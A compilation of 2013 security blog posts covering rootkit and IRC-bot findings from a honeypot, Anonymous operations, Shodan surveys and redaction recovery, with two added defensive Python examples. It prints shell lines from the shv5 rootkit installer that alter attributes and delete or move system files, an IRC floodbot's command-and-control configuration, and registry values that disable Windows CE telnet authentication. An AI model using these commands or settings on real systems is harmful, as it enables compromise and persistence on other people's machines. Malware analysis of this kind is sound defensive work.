    if [ -f /etc/ttyhash ]; then
        chattr -AacdisSu /etc/ttyhash
        rm -rf /etc/ttyhash
    fi
    if [ -d /lib/ldd.so ]; then
        chattr -isa /lib/ldd.so
        chattr -isa /lib/ldd.so/*
        mv /lib/ldd.so $HOMEDIR/.owned/tk8
        echo "${RED}[${WHI}sh${RED}]# tk8 detected and owned ...!!!! ${RES}"
    fi
    if [ -d /usr/src/.puta ]; then
        chattr -isa /usr/src/.puta
        chattr -isa /usr/src/.puta/*
        mv /usr/src/.puta $HOMEDIR/.owned/tk7
        echo "${RED}[${WHI}sh${RED}]# tk7 detected and owned ...!!!! ${RES}"
    fi


Make no mistake - today's attackers are smart. They will do whatever they can to keep a foothold on compromised systems, including blocking access by other attackers. If you're interested in seeing more, you can view the full setup script at the [3]CaffSec Malware Analysis Google Code site.
1. https://www.virustotal.com/en/file/65f0a275a4ab5eeeb1d115f888527ceced0546110669fe5b4984aeb9158d8bf7/ analysis/1367425595/ 2. http://www.tripwire.com/it-security-software/security-configuration-management/file-integrity-monitoring/ 3. https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/rk/var/tmp/setup
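The defensive lesson from the installer is that nothing on the box can be trusted to measure the box: md5sum replays recorded hashes and the Tripwire database has been replaced with a text file. The following is an added example (not code from the original post or from shv5) that verifies binaries against a baseline using in-process hashing, so the host's md5sum is never consulted, and that recognises the fake "segment-faulted" text the installer writes into the .twd. The file names and contents are constructed for the demo, and the baseline is assumed to be kept off the host.

```python
import hashlib
import os
import tempfile

# Text the shv5 installer writes into the Tripwire database to disguise the
# corruption as a disk problem (taken from the installer script above).
FAKE_TRIPWIRE_ERROR = b"Tripwire segment-faulted"


def sha256_file(path, chunk=65536):
    """Hash a file in-process. Never shell out to md5sum/sha256sum on the
    suspect host: shv5 replaces /usr/bin/md5sum with a copy that replays
    the hashes it recorded before swapping the binaries."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(paths):
    """Taken while the host is known-good. Assumption for this demo: the
    result is stored OFF the host (read-only media, a central server), so
    the installer cannot rewrite it the way it rewrites the .twd."""
    return {p: sha256_file(p) for p in paths}


def check_binaries(baseline):
    """Paths whose current hash differs from the baseline, or that are missing."""
    return [p for p, good in baseline.items()
            if not os.path.isfile(p) or sha256_file(p) != good]


def tripwire_db_looks_corrupted(twd_path):
    """shv5 overwrites the .twd with a plain-text fake error. A real database
    never starts with that text, so finding it is evidence of the rootkit,
    however plausible the 'disk error' story reads."""
    if not os.path.isfile(twd_path):
        return False
    with open(twd_path, "rb") as f:
        return FAKE_TRIPWIRE_ERROR in f.read(4096)


def demo():
    """Replay the attack in a temp dir: baseline, trojan 'ps', fake the .twd."""
    root = tempfile.mkdtemp()
    ps, ls = os.path.join(root, "ps"), os.path.join(root, "ls")
    twd = os.path.join(root, "host.twd")
    with open(ps, "wb") as f:
        f.write(b"\x7fELF original ps")          # constructed stand-in
    with open(ls, "wb") as f:
        f.write(b"\x7fELF original ls")          # constructed stand-in
    baseline = build_baseline([ps, ls])          # taken while clean
    with open(ps, "wb") as f:                     # the installer's mv -f ps
        f.write(b"\x7fELF trojaned ps hiding attacker processes")
    with open(twd, "wb") as f:                    # the installer's echo > $twd
        f.write(b"\nTripwire segment-faulted !\n\nThe reasons for this may be:\n")
    return {
        "tampered": [os.path.basename(p) for p in check_binaries(baseline)],
        "fake_twd": tripwire_db_looks_corrupted(twd),
    }


if __name__ == "__main__":
    print(demo())
```

The hashing is done by the Python interpreter rather than by /usr/bin/md5sum, which is the whole point: the check is only as trustworthy as the code doing the hashing and the place the baseline lives, so in practice run it from a live CD or over the wire from a clean host.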
3.5.3 OpUSA to Strike US Government and Banking Infrastructure May 7 (2013-05-05 00:42)

Anonymous and several other hacking groups are planning to attack the US Government and Banking Infrastructure on May 7, 2013. I added a threat briefing on OpUSA, what's being targeted, and by whom, to my Threat Watch site. Currently, the only named targets of this attack are Whitehouse.gov, FBI, and Bank of America. However, I'm sure other targets will be included. If you work for a government agency, or in the banking industry, be vigilant, and be on the lookout for highly targeted phishing attacks. You can read the [1]full briefing at my Threat Watch site.
1. https://sites.google.com/site/caffsec/current-cyber-threats/opusa

3.5.4 eBook Review: The Password Management Guide (2013-05-05 11:02)

[1] Let's be honest. Most people have a small set of passwords they reuse on multiple websites. They come up with a password they think is secure, but by reusing the password on multiple sites, a compromise of one account results in a compromise of the rest. But nobody would want to hack you, right? Wrong. There's a lot of value in a compromised account.

Do you use Amazon.com? A compromised account can order goods and have them shipped to a different address. Do you use PayPal? A compromised account could wipe out your bank account. Do you email family and friends? A compromised account could be used by scammers to trick your family and friends into sending money through Western Union to the scammer overseas. Do you use social networking? A compromised account could be used to spam your friends. But remembering multiple, complex passwords is hard!!!! It doesn't have to be. I was very impressed by the information contained within The Password Management Guide. The guide covers the following topics and more:

- Dangers of password re-use
- How to create a secure password
- Examples of available password manager programs
- Two-factor Authentication
- How to monitor to see if your password has been compromised

BlogBook

I found the guide very well written, and it should be extremely useful to anyone regardless of tech-savvy level. And the good news is, for a limited time you can get the 35-page eBook FREE! [2]Download Here! Do you like the guide? Hate it? Feel free to let me know in the comments section below.
1. http://img.tradepub.com/free/w_make107/images/w_make107c.gif 2. http://caffinesecurity-blogspot.tradepub.com/free/w_make107/?p=w_make107

3.5.5 #OpUSA - So far an Epic Failure (2013-05-06 23:07)

In the early hours of #OpUSA, in the words of Anonymous, "Op has failed to deliver!" Anonymous et al. actually started their hacking spree on [1]May 4...but no one really noticed. Probably because most of the websites were foreign-hosted sites (you know, outside the target USA), or sites most people have never even heard of. Somewhere the SEO marketing gurus of jrzydevilmarketing.info and clearseo.net are quietly cursing, but if a tree falls on an SEO marketer's website, but no one ever visits it, does it still make a sound? The attackers stepped up their game on May 5 and hacked even more websites. And by [2]more, I mean [3]more websites most people have never heard of in the USA.

Protip: Hacking Chinese, French, and Italian websites in the name of #OpUSA does not make a bit of difference to 99.999 % of people in the USA. May 6 - They HACKED BANK OF AMERICA. OMG!!!! No...wait...they hacked [4]Blood Bank of America. Really guys? You hacked a blood bank? This speaks of fail on so many levels it's not funny. That's like using your bat to call out a home run, then hitting a ground rule double. Sure, it just went out of the park, but it's nowhere near as effective. Early hours of May 7 - A [5]short list of websites was published (because these guys are clearly riding a short bus), and finally a target barely worth noting - the [6]Honolulu Police Department alert system, which isn't even used anymore.

"HPD Alerts was a pilot program (used) to provide breaking information to the public," Yu said. "It was recently discontinued due to technical problems not associated with the cyberattack." So let's see - Anonymous and company planned to take down [7]Whitehouse.gov, FBI, and Bank of America. In fact, they even made this statement:

Anonymous will make sure that this May 7th will be a day to remember. On that day Anonymous will start phase one of operation USA. America you have committed multiple war crimes in Iraq, Afghanistan, Pakistan, and recently you have committed war crimes in your own country

So...you've got less than 24 hours for OpUSA to be a day to remember. So far it's been an epic failure which will be forgotten by Friday. #TickTock
1. http://pastebin.com/zftTrrrh 2. http://pastebin.com/H9csfwA7 3. http://pastebin.com/UW3Pdqkn 4. http://pastebin.com/fUmPjPDt 5. http://www.pastebay.com/1205330 6. http://www.staradvertiser.com/news/breaking/20130506_HPD_alert_system_hacked_user_emails_and_passwords_ compromised.html 7. https://sites.google.com/site/caffsec/current-cyber-threats/opusa

3.5.6 OpUSA Updated Target List Posted (2013-05-07 00:33)

I've managed to get a copy of the OpUSA target list. If you're at one of these organizations, be extra vigilant.

HIGH profile target list:
http://www.defense.gov/
http://pentagontours.osd.mil/
http://www.pentagonchannel.mil/
http://www.archives.gov/
http://www.whs.mil/
http://www.nsa.gov/
http://nsa.nato.int
http://www.fbi.gov/
http://www.whitehouse.gov/

Additional targets are listed in the updated [1]Threat Watch brief.
1. https://sites.google.com/site/caffsec/current-cyber-threats/opusa

3.5.7 The NSA's Guide to Internet Research (2013-05-08 19:40)

[1] The NSA recently released on their [2]Declassification and Transparency page "Untangling The Web - A Guide to Internet Research". This 642-page document contains search techniques and tips for everything from basic search fundamentals to Google Hacking and even how to find information on the Invisible Internet. Now before you begin reading the document, be aware it is a bit outdated, as it was released in 2007. However, the document not only provides excellent insight into general advanced search techniques, but also serves as a glimpse of what kind of web research is performed by the NSA.

[3] Some of the best search advice I've ever seen. One of the more interesting pieces of the document I found was the Google hacking section, most of which is still relevant today.

[4] Sensitive files can be very revealing.

You can download Untangling The Web directly [5]from the NSA's website.
1. http://4.bp.blogspot.com/-21YnGYDiME8/UYreCOc5UCI/AAAAAAAAAZQ/ESpa-8Ui2vk/s1600/UTW.jpg 2. http://www.nsa.gov/public_info/declass/index.shtml 3. http://3.bp.blogspot.com/-NKw3Tu4sEMY/UYrhsWHBFqI/AAAAAAAAAZs/9uGWOkR1mzE/s1600/rotr.jpg 4. http://2.bp.blogspot.com/-vXGNGJy_XIQ/UYrg8rAtNFI/AAAAAAAAAZg/Zq0LPafPK6k/s1600/undocumented-google.jpg 5. http://www.nsa.gov/public_info/_files/Untangling_the_Web.pdf

3.5.8 OpUSA Failure Shows Anonymous is Past Their Prime (2013-05-08 22:18)

There have been indications of this for quite a while now, but I think it's time someone finally came out and said it. Anonymous is losing steam, and quickly dying. That's right, Anonymous is quickly becoming an obsolete part of a forgotten era of the Internet. OpUSA promised to be a major cyber threat against the United States Government and major banks. Websites such as FBI.gov, Whitehouse.gov, and Bank of America were the key targets. The actual damage? (per [1]http://security.radware.com/Threats-Attacks/opusa/)

- An alert system which was being decommissioned by the Honolulu Police Department
- A Blood Bank
- Embassy of Cape Verde in the US
- ...and a handful of low-traffic websites which most people have never heard of.


So what happened? Simply put, most of the smart hackers in Anonymous have already been arrested, or have realized that prison orange does not look good on them. Compound with this the fact that members of Anonymous now know that their organization has been compromised by terrorist groups and law enforcement alike, and many members of Anonymous are now most likely finished with the group's illegal activities. A quick look at the number of news headlines about "Anonymous Hacker" shows the group has definitely gone past their prime, and may soon be going the way of the dodo, at least for their hacking activities. How much longer will Anonymous hacking groups last? Based upon current trends they may still be around for a while yet, but gone are the days where Anonymous should be considered a serious threat. Instead, after the failure of OpUSA, they're now probably the laughing stock of the Internet. If you're interested, you can pick up a [2] #OpUSA #FAIL t-shirt from my CafePress shop.
1. http://security.radware.com/Threats-Attacks/opusa/ 2. http://www.cafepress.com/caffeinesecurity/10057209

3.5.9 Identifying Hacker Group Locations Based Upon Temporal Signatures (2013-05-09 19:15)

What day and time an event occurs can sometimes be very helpful in determining the origin of that event. Analysis Intelligence just posted an excellent article titled [1]Pattern of Life and Temporal Signatures of Hacker Organizations. This article explores the possibilities of using the day/time of hacking activity to determine not only what part of the world the activity originated from, but also whether they're a state-sponsored group or not. I highly encourage you to check out the article, and if applicable, apply it to your own research.
1. http://analysisintelligence.com/cyber-defense/temporal-signatures-of-hacker-organizations/

3.5.10 Hacking to Setup a Free Counter Strike Server? (2013-05-10 16:05)

This week an attacker cracked my honeypot's root password "123456" and tried to install software I've never seen before. The file was quite large for most malware packages, at over 20 MB. Curiously, I uploaded the file to VirusTotal and was quite surprised that it came back completely clean.

[1]VirusTotal Analysis of csservers redirecte linux hlds.zip

After digging into the file further, I found that the file was actually a Counter Strike server? Sure enough, the more I dug, the more I verified that the hacker had compromised my honeypot with the sole purpose of running a Counter Strike server.

[2] I use the term "hacker" loosely because, based upon the attack, the person did not seem very knowledgeable outside of using his install scripts. You can read the full attack logs on [3]Google Drive. This is the first time I've ever seen someone compromise a system to install a game server. I know there was a day when IRC chat bots were all the rage and people would compromise servers just to install them, but they're lightweight and don't generate a lot of traffic. A gaming server is going to generate a lot of traffic and CPU load, and surely would be noticed almost right away, right???
1. https://www.virustotal.com/en/file/de2e64a3b45dab4b8d85071c7b1bc7106aa0f20bf52332210caf43c33621c738/analysis/ 2. http://1.bp.blogspot.com/-7KbGt4m-8sU/UY1QulLPgZI/AAAAAAAAAaM/RCrmUB0uYk0/s1600/csserver.jpg 3. https://docs.google.com/document/d/1GeC50CA_6jwVRJ748VjWdaxZCWCaoAISSitqPzJYak4/edit?usp=sharing

3.5.11 IRC Floodbot Placed on My Honeypot (2013-05-11 01:09)

Someone dropped off an IRC Floodbot today on my honeypot. It's nothing spectacular or groundbreaking, and appears to have been around since at least 2009, maybe earlier. I've replaced the binaries with VirusTotal analysis, and posted everything else as I received it. You can browse the shell scripts, as well as the malware's help file, at my [1]Google Code site. By the way, here's the config info for the bot's command and control center:

    NICK      Hack
    USERFILE  1
    CMDCHAR   *
    LOGIN     eliata
    IRCNAME   juno boot flood
    MODES     +ix-ws
    TOG CC 0
    TOG CLOAK 1
    TOG SPY 1
    SET OPMODES 4
    SET BANMODES 6
    SET AAWAY 1
    TOG NOIDLE 1
    CHANNEL #m0atrea
    TOG PUB 1
    TOG MASS 1
    TOG SHIT 1
    TOG PROT 1
    TOG ENFM 1
    SET ENFM +nt
    SET MDL 4
    SET MKL 4
    SET MBL 4
    SET MPL 1
    SERVER irc.deadly-co.ro 6667

I hope you enjoy examining the bot.


1. https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/FlooderIRCBot/

3.5.12 @USNISTGOV CVE Alerts Now On @CaffSec Twitter (2013-05-11 08:22)

Thanks to the folks at NIST for providing an RSS feed of new CVEs, I have incorporated CVEs into my automated [1] #exploitAlert feed on [2]Twitter. In addition to CVE content, the #exploitAlert feed provides information on new vulnerabilities/exploits found on PasteBin and similar sites. If you're interested in how the CVE feed works, I have made the feed available on my [3]IFTTT profile.
1. https://twitter.com/search/realtime?q=%23exploitAlert&src=typd 2. https://twitter.com/CaffSec 3. https://ifttt.com/people/caffsec

3.5.13 How Not to Redact a Document, Part 2 (2013-05-11 09:29)

Last year I made a post about How Not To Redact a Document, in which I showed that some digitally redacted documents can have the redaction removed by [1]simply highlighting the redacted text. Unfortunately, digitally redacted documents aren't the only ones susceptible to attack. Recently the IRS has come under fire for sending Tea Party groups probing letters threatening their non-profit status unless they [2]answer a large number of questions. Fox News redacted parts of the letter, as you can see below.

[3]

However, Fox News really failed at their redaction process, and left a lot of sensitive information exposed. I personally use a photo editor called Zoner Photo Studio, but the same technique can be used in Photoshop. First, let's play with the image levels a little bit...

[4]

Move some sliders around, and text begins to magically appear!

[5] Now let's adjust the contrast and brightness a little.

[6] After performing the manipulations above, I doubled the size of the image for easier examination.

[7] Click to View Full Size

You can pretty clearly make out some of the details, including mailing address and phone numbers. Of course this [8]information is already [9]available online anyway, so I'm not sure why it was redacted. However, this could be a very interesting technique to use against [10]Freedom of Information Act documents with redacted sections. Once again, related reading: [11]A Primer On Electronic Document Security. Maybe someone will pay attention this time.
1. http://caffeinesecurity.blogspot.com/2012/09/how-not-to-redact-document.html 2. http://www.foxnews.com/politics/interactive/2013/05/10/letter-from-irs-to-waco-tea-party/ 3. http://3.bp.blogspot.com/-Epes2AY5qVI/UY5DaGbuw_I/AAAAAAAAAac/gb-K7D-cyAk/s1600/redact-1.png 4. http://1.bp.blogspot.com/-ko4CJRP09ZE/UY5FhYXqMWI/AAAAAAAAAao/BAleN4EpCtA/s1600/redact-2.png 5. http://3.bp.blogspot.com/-2BKRArgPyek/UY5Fpz03IxI/AAAAAAAAAaw/9hcRH-am8lk/s1600/redact-3.png 6. http://1.bp.blogspot.com/-cyCLyb2f4io/UY5F-455kKI/AAAAAAAAAa4/yi2ioOXIAB8/s1600/redact-4.png 7. http://3.bp.blogspot.com/-M-7kibgSjEU/UY5GNllU-vI/AAAAAAAAAbA/09ekqdZhYic/s1600/redact-5.png 8. http://www.irs.gov/Charities-&-Non-Profits/How-to-Contact-the-Tax-Exempt-and-Government-Entities-Division 9. https://www.wacoteaparty.org/Contact_Us.html 10. http://www.foia.gov/ 11. http://caffinesecurity-blogspot.tradepub.com/free/w_aaaa2459/?p=w_aaaa2459
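To make the point concrete, here is an added example (not from the original post; it uses a constructed grayscale "image" held as a list of rows rather than a real file) showing why a darkened region is not a redacted one: a brightness/opacity slider is an invertible levels operation, so the same levels stretch used above restores the text, whereas overwriting the pixels leaves nothing to stretch.

```python
def render_text_region(pattern, fg=30, bg=200):
    """Turn an ASCII pattern into a grayscale region: '#' = ink, '.' = paper.
    Values are 0..255 as in an 8-bit image (constructed sample)."""
    return [[fg if ch == "#" else bg for ch in row] for row in pattern]


def darken(region, factor=0.06):
    """'Redaction' done with a brightness/opacity slider: every pixel gets
    much darker, but the ordering of the values (the information) survives."""
    return [[int(p * factor) for p in row] for row in region]


def black_out(region):
    """Real redaction: every pixel becomes the same value; the text is gone."""
    return [[0 for _ in row] for row in region]


def levels_stretch(region):
    """The 'move the sliders' step from the post: map the region's darkest
    value to 0 and its brightest to 255. Returns None when the region is
    flat, i.e. there is nothing left to recover."""
    flat = [p for row in region for p in row]
    lo, hi = min(flat), max(flat)
    if hi == lo:
        return None
    return [[(p - lo) * 255 // (hi - lo) for p in row] for row in region]


def to_ascii(region, threshold=128):
    """Binarise a region back into '#'/'.' so the recovered text is readable."""
    return ["".join("#" if p < threshold else "." for p in row) for row in region]


SAMPLE = [  # constructed 'glyph' pattern standing in for a phone number
    "###.#..",
    "#.#.#..",
    "###.###",
]


def recover(redaction):
    """Apply the chosen redaction to SAMPLE, then the attacker's levels stretch."""
    original = render_text_region(SAMPLE)
    redacted = redaction(original)
    stretched = levels_stretch(redacted)
    return None if stretched is None else to_ascii(stretched)


if __name__ == "__main__":
    print("darkened :", recover(darken))     # the glyphs come back
    print("blacked  :", recover(black_out))  # None: nothing to recover
```

After darken() the ink is value 1 and the paper value 12, both black to the eye, yet the stretch maps them to 0 and 255 and the pattern is back exactly. On a real file the levels_stretch step is what Pillow's ImageOps.autocontrast or any editor's Levels dialog does, so the only redaction that survives it is one that overwrites the pixels and is saved without the original layer.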

3.5.14 New Honeypot Online! (2013-05-11 18:10)

I just got my second honeypot up and running - [1]Glastopf! This honeypot will allow me to capture HTTP-based attacks, as well as the SSH attacks I'm already capturing with Kippo. If I get any interesting hits I'll be sure to post!
1. http://glastopf.org/

3.5.15 Facebook Graph Search and Anonymous (2013-05-12 20:58)

People who like Anonymous and Izz ad-Din al-Qassam Brigades (Hamas): 53
People who like Anonymous and work at U.S. Federal Government (Includes FBI and CIA): 50
People who like Anonymous and attended Yale University: 106
People who like Anonymous and attended Harvard University: 828
People who like Anonymous and attended University of Maryland: 26
People who like Anonymous and are Lawyers: 329

3.5.16 Possibly Malicious Tor Exit Node Found in the Wild (2013-05-17 14:37)

Today I started doing some research on Tor, looking at the different exit nodes and who hosts them. While the diversity of hosts is interesting and worthy of a future blog post, what I stumbled on was quite disturbing. I have identified a possibly malicious Tor exit node.

3.5.17 Tor and Censorship (2013-05-17 19:22)

[1]https://check.torproject.org/cgi-bin/TorBulkExitList.py
1. https://check.torproject.org/cgi-bin/TorBulkExitList.py


3.5.18 OpPetrol - It's Not About the Oil (2013-05-19 14:32)

I've posted a new Threat Watch bulletin for OpPetrol - a multi-target operation being run by Anonymous. Updates to the bulletin can be read [1]here. Below is the bulletin posted in its entirety.

INTEL BRIEF
First Release: 19MAY2013
Updated: 19MAY2013
Subject: Anonymous OpPetrol
Target: United States, Canada, United Kingdom, Israel, Saudi Arabia (only Government), China, Italy, France, Germany, Kuwait (only government) and Qatar (only government)
Specific named targets: Saudi Arabia government emails (Most likely Phishing - [2]http://pastebin.com/0Yr6kyWA)
Additional high probability targets: Pending
Date: June 20, 2013
Attackers: AnonGhost; Others Pending
Attack types: Distributed Denial of Service Attacks (DDoS); Website Defacement; Possible leak of sensitive information
Details:
Original announcement on Pastebin: [3]http://pastebin.com/Xsewfqvr
Second announcement on Pastebin: [4]http://pastebin.com/38kvvD1S
Quote: "As petrol is sold with the dollar currency of the U S we find this not acceptable when the oil should be sold at the country of Origin, making petrol a lot less then what you the citizens is paying for it."

Additional Analysis: A look at the target list vs. top oil producers of the world (data from [5]CIA World Factbook)

Rank  Target List  Top Oil Producers      Amount Produced (BBL/Day)
1     No           Russia                 10,370,000
2     Yes          Saudi Arabia           10,000,000
3     Yes          United States           9,023,000
4     No           Iran                    4,231,000
5     Yes          China                   4,150,000
6     Yes          Canada                  3,592,000
7     No           United Arab Emirates    3,087,000
8     No           Mexico                  2,934,000
9     No           Iraq                    2,900,000
10    Yes          Kuwait                  2,682,000
11    No           Brazil                  2,633,000
12    No           Nigeria                 2,525,000
13    No           Venezuela               2,470,000
14    No           Norway                  1,998,000
15    No           Algeria                 1,885,000
16    No           Angola                  1,840,000
17    No           Kazakhstan              1,635,000
18    Yes          Qatar                   1,631,000
19    Yes          United Kingdom          1,099,000
...   ...          ...                     ...
43    Yes          Germany                   165,300
50    Yes          Italy                      99,200
60    Yes          France                     49,530
101   Yes          Israel                        100
102   No           Jordan                         20
103   No           Slovenia (Last Place)           5

Based upon the above target list, this attack has nothing to do with oil exports, especially since Israel only produces 100 BBL/Day and is third from the bottom. Also of interest, the announcement speaks about Syria stealing "your retirement and savings", but it was [6]Cyprus, not Syria, that raided savings accounts when the country went bankrupt. This operation appears to simply be an attempt at OpUSA and OpIsrael again, with a few extra countries thrown into the mix so that the operation can be declared a success even if only one of the target countries is compromised. This operation is simply a publicity stunt, and not by any means a meaningful attempt to change anything.

Recommendations: Standard recommendations apply.
Note: Based upon the past failures of OpIsrael and OpUSA, do not expect a large turnout for this operation either.
Prior to June 20 - In order for multiple sites to be defaced at the same time, malware infection or compromise of credentials must occur ahead of time. Change passwords, and perform full antivirus scans of systems. Monitor firewall logs for suspicious activity involving external IP addresses. Be vigilant, and warn employees of highly targeted phishing attacks.
On June 20 - Monitor network traffic, and coordinate with your ISP should any signs of DDoS be seen.
After June 20 - Look for signs of compromise after the DDoS attack. A common technique now being employed by multiple organizations is to mask hacking attacks with DDoS attacks.
Recorded Future Analysis: [7]https://www.recordedfuture.com/live/sc/1L4n2d6OXDi8
1. https://sites.google.com/site/caffsec/current-cyber-threats/oppetrol---june-20 2. http://pastebin.com/0Yr6kyWA 3. http://pastebin.com/Xsewfqvr 4. http://pastebin.com/38kvvD1S 5. https://www.cia.gov/library/publications/the-world-factbook/rankorder/2241rank.html 6. http://www.newsmax.com/Rahn/Government-Savings-Cyprus-banks/2013/03/27/id/496552 7. https://www.recordedfuture.com/live/sc/1L4n2d6OXDi8

3.5.19 FREE CLASS!!! Malicious Software and its Underground Economy (2013-05-19 23:41)

Starting June 13 I will be taking the free Coursera course [1]Malicious Software and its Underground Economy. The course will explore the world of malicious software, and look at how it's used to generate millions of dollars per year. If you have some programming experience, as well as security experience, I'd like to encourage you to sign up!
1. https://www.coursera.org/course/malsoftware

3.5.20 An Open Letter to @ChaCha Regarding Copyright Infringement (2013-05-20 03:00)

UPDATE: ChaCha was [1]VERY helpful with this, and resolved the issue right away! Stay classy ChaCha! This evening I stumbled on something a little disturbing. ChaCha has answered the question [2]"How do I save a picture from SnapChat on a droid?" word-for-word with text from [3]my own blog post on the subject. As such, I have submitted the following letter to ChaCha.
Hello,

I happened across the answer to "How do I save a picture from Snapchat on a Droid?" tonight, and I'm a little upset. The answer is directly copied from a post on my blog caffeinesecurity.blogspot.com.

In accordance with Fair Use, I would like to request that should you wish to continue to include this content word-for-word from my blog, that you also include a link to the source blog post http://caffeinesecurity.blogspot.com/2012/12/snapchat-covert-screen-capture-for.html. I feel this would be a win-win for both of us, and we won't need to worry about getting your legal department involved.

I eagerly await your response within 10 business days.

Thanks,

Ken
Caffeine Security

[4]

[5]
1. http://caffeinesecurity.blogspot.com/2013/05/chacha-you-guys-rock-thanks-for-help.html 2. http://www.chacha.com/question/how-do-i-save-a-picture-from-snapchat-on-a-droid 3. http://caffeinesecurity.blogspot.com/2012/12/snapchat-covert-screen-capture-for.html 4. http://1.bp.blogspot.com/-QZdcZ4i7uSg/UZnJN3Z7yLI/AAAAAAAAAb4/26obuSxu0OQ/s1600/chacha.png 5. http://2.bp.blogspot.com/-wUojMkDQQwk/UZnJSxg46UI/AAAAAAAAAcA/IwLg0-uhafs/s1600/caffsecblogsnapchat.png

3.5.21 Tech Support SCAM! The MUST SEE Video about iYogi! (2013-05-21 00:15)

Having personally seen the fear mongering iYogi used against a family member to get her to pay for their services (and having to clean up her computer after their software was installed), this video does not shock me in the least. Share this video with all your friends and family and warn them about the scam which is iYogi tech support. [embedded video]

3.5.22 @ChaCha You Guys Rock, Thanks for the Help! (2013-05-21 00:35)

You might have read my [1]open letter to ChaCha regarding copyright infringement and fair use of my [2]SnapChat blog post. I'm happy to say that ChaCha was very polite, and corrected the issue immediately along with an [3]apology! I didn't have to jump through any legal hoops or anything. I politely asked, and they reacted right away. This is how human resources and customer service should be done, folks. Stay Classy [4]ChaCha!
1. http://caffeinesecurity.blogspot.com/2013/05/an-open-letter-to-chacha-regarding.html 2. http://caffeinesecurity.blogspot.com/2012/12/snapchat-covert-screen-capture-for.html 3. https://twitter.com/ChaCha/status/336495661463773184 4. http://www.chacha.com/

3.5.23 FREE eBook: Intrusion Detection Systems with Snort: Advanced IDS Techniques (2013-05-22 19:17)

Receive Your Complimentary eBook NOW!

[1] Intrusion Detection Systems with Snort: Advanced IDS Techniques Using Snort, Apache, MySQL, PHP, and ACID

Protect your network with Snort: the high-performance, open source IDS. Snort gives network administrators an open source intrusion detection system that outperforms proprietary alternatives. Now, Rafeeq Ur Rehman explains and simplifies every aspect of deploying and managing Snort in your network. You'll discover how to monitor all your network traffic in real time; update Snort to reflect new security threats; automate and analyze Snort alerts; and more. Best of all, Rehman's custom scripts integrate Snort with Apache, MySQL, PHP, and ACID - so you can build and optimize a complete IDS solution more quickly than ever before.

- An expert introduction to intrusion detection and the role of Snort
- Writing and updating Snort rules to reflect the latest attacks and exploits
- Contains detailed coverage of Snort plug-ins, preprocessors, and output modules
- Logging alerts to a MySQL database
- Using ACID to search, process, and analyze security alerts
- Using SnortSnarf to analyze Snort log files
- XML support for Snort via the Simple Network Markup Language (SNML)

[2]Request your free copy today!
1. http://img.tradepub.com/free/w_infk17/images/w_infk17c4.gif 2. http://caffinesecurity-blogspot.tradepub.com/free/w_infk17/prgm.cgi
3.6 June

3.6.1 Using Shodan to Measure The Security of the Internet (2013-06-01 02:01)

[1]Shodan is a search engine for potentially vulnerable computer systems, based upon header information. It allows you to perform a lot of neat tricks, such as seeing what your organization's public footprint looks like, as well as your competitors'. You can use it to find interesting devices such as routers, webcams, printers, etc. I performed the following searches to see just how many glaringly obvious vulnerable systems are exposed to the internet. First search: IIS/5.0. This search will produce systems which are running Windows 2000 with an IIS web server. Of course Windows 2000 and IIS 5.0 are no longer supported by Microsoft, and multiple vulnerabilities are publicly known. So needless to say, I was quite disturbed when I found half a million exposed IIS/5.0 web servers.

[2] IIS 5.0 on Windows 2000

Surely no one would be running a version of Windows older than Win 2000, and connect it to the Internet, right?

I decided to try my luck and search for even older versions of IIS. And while the numbers weren't as severe as the IIS/5.0 numbers, the number of extremely vulnerable web servers out there is shocking.

[3] IIS 4.0 on Windows NT 4.0

[4] IIS 3.0 on Windows NT 4.0 SP2+

[5] IIS 2.0 on Windows NT 4.0 with Service Pack less than 2.0

Surely no one would be running a server with less than NT 4.0? Well, maybe they are. In fact, there's almost 1,000 of them...

[6] IIS 1.0 on Windows NT 3.51, Unsupported as of December 2001

If you look at the first entry on the list, you'll see that I'm not the first person to look for IIS 1.0 instances with Shodan. Someone actually hacked the first system on the list, and altered its HTTP header information to inform you the system was already compromised. Every one of these systems is a potential botnet drone just waiting for infection, if they haven't been compromised already. If you're not concerned, you should be. These servers are your neighbors on the Internet. Once they are compromised, they can be used to attack your organization. According to Netcraft, in May 2013 there were over 672 million web sites on the Internet. So while the number of unsupported Microsoft web servers is less than 1 % of the Internet, these are still alarming numbers. (Keep in mind that a Server: header is only a string the server, or a proxy in front of it, chooses to send, so treat these counts as an upper bound rather than a verified inventory.) If these results are any indication of just how vulnerable the internet is, we've got a long way to go to properly secure it.

1. http://www.shodanhq.com/
2. http://4.bp.blogspot.com/-cMwN4VtkDh8/UamD2Mqp_7I/AAAAAAAAAcc/HdZz6IK2aXs/s1600/iis5.png
3. http://3.bp.blogspot.com/-r463oa8ZnXU/UamFlE8eE4I/AAAAAAAAAcs/BaZCY3oCINI/s1600/iis4.png
4. http://3.bp.blogspot.com/-5sKV-OGdqHE/UamGLEKaVNI/AAAAAAAAAc0/q2BbiknWRdo/s1600/iis3.png
5. http://3.bp.blogspot.com/-276gvJQDq_o/UamGxm5sGqI/AAAAAAAAAc8/O1dGsQEKhzo/s1600/iis2.png
6. http://2.bp.blogspot.com/-6OoMra8mw9I/UamIP8-ASiI/AAAAAAAAAdI/xkRjltVxmok/s1600/iis1.png


3.6.2

Unauthenticated Windows CE Telnet Service Vulnerable Configuration (2013-06-01 02:31)

Since this is a Windows CE configuration issue, and not a software vulnerability, I am releasing this information publicly so that software developers can be aware of the issue. Tonight I stumbled on a quite scary Shodan search which I'd like to share with everyone. [1]Windows CE Telnet Service

What is the Windows CE Telnet Service? Apparently Windows CE has a built in telnet service for debugging of applications, as outlined in [2]this MSDN blog post. Now the truly scary part about all this is that the telnet server has the ability to disable authentication requirements.

    [HKEY_LOCAL_MACHINE\COMM\TELNETD]
    UseAuthentication=dword:0
    IsEnabled=dword:1

When you do disable the authentication requirements (for debugging purposes only of course), you're greeted with an administrator level command prompt as soon as you connect with telnet. From there you can perform all sorts of fun things, like restart the device or access any locally stored file; pretty much any command which is typically available at a Windows command line. Despite the fact that this was only intended for debugging purposes, Shodan found 892 public facing systems with this vulnerability. Who knows how many thousands more reside behind corporate firewalls, with organizations completely unaware that their devices with embedded Windows are vulnerable to attack.

[3] Vulnerable Windows CE Telnet Services

